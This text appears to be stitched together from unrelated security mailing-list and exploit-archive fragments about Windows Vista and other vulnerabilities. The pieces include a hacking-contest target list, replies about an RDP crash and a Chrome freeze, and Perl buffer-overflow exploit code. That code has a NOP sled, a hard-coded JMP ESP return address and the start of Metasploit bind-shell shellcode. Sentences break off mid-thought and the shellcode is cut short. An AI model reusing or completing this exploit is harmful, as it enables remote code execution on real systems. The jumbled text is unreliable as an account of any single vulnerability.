claim the prize.
Targets (typical road-warrior clients):
VAIO VGN-TZ37CN running Ubuntu 7.10
Fujitsu U810 running Vista Ultimate SP1
MacBook Air running OSX 10.5.2
This year's contest will begin on March 26th, and go during the
presentation hours and breaks of the conference until March 28th.
The main purpose of this contest is to present new vulnerabilities in
Unable to reproduce on Vista Ultimate x64-all patch levels.
John Menerick
www.securesql.info
On Sep 8, 2009, at 11:35 AM, Tim Medin wrote:
> Creating multiple RDP connection at the same time causes Windows to
> Blue Screen. Here is the Proof of Concept code.
print "[+] Exploiting.....\n" ;
my $buff="http://"."\x41" x 969 ;
my $nop ="\x90" x 6000 ;
my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows Vista Ultimate English
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
-----------------------------
Using the sample program it was possible to verify this issue on the following operating systems and configurations:
* Microsoft Windows Vista Enterprise 32 bit & 64 bit
* Microsoft Windows Vista Ultimate 32 bit & 64 bit
It is very likely that other versions of Windows Vista are affected by this issue.
This issue did not occur on Windows XP.
I can confirm that the PoC indeed freezes Chrome 0.2.149.29 (looks like inf loop, not responding to anything, the whole browser, not a renderer only) on Microsoft Windows Vista Ultimate SP1.
I can also confirm that the PoC DOES NOT freeze Chrome on Microsoft Windows XP Pro SP2.
Is it system dependent?